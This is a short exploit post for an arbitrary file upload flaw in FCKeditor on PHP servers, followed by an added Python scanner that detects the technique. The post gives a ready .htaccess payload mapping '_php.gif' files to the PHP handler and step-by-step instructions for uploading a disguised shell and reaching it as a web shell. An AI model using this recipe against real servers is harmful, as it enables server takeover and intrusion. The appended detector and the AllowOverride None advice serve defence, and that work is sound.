
FCKeditor upload vulnerability in all PHP versions

Posted on 2013-10-27 17:25:21
Author: Anonymous | Source: compiled by this site | Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name “shell.php.gif” changes to “shell_php.gif” automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
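
A defensive check for the technique in this post, as an added example that is not part of the original post: it scans an upload directory for a .htaccess that maps files to the PHP handler and for image-named files that contain a PHP open tag. The function names, reason strings and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# .htaccess directives that can route arbitrary files to the PHP handler.
HANDLER_DIRECTIVE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|ForceType)\b.*php", re.I | re.M)
# Extensions that should only ever be static content in an upload directory.
STATIC_EXT = (".gif", ".jpg", ".jpeg", ".png", ".bmp")
PHP_TAG = re.compile(rb"<\?php", re.I)


def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # only the first 1 MiB is inspected
            if name.lower() == ".htaccess":
                if HANDLER_DIRECTIVE.search(data.decode("latin-1")):
                    findings.append((rel, "htaccess maps files to PHP handler"))
                else:
                    findings.append((rel, "htaccess in upload directory"))
            elif name.lower().endswith(STATIC_EXT) and PHP_TAG.search(data):
                findings.append((rel, "image-named file contains PHP open tag"))
    return sorted(findings)


def build_sample(root):
    """Write a constructed sample tree mirroring the files named in the post."""
    samples = {
        ".htaccess": b'<FilesMatch "_php.gif">\n'
                     b"SetHandler application/x-httpd-php\n</FilesMatch>\n",
        "shell_php.gif": b"GIF89a<?php /* constructed placeholder */ ?>",
        "photo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan_upload_dir(tmp):
            print(f"{rel}: {reason}")
```

Setting AllowOverride None for the upload directory in the main Apache configuration stops an uploaded .htaccess from being honored at all.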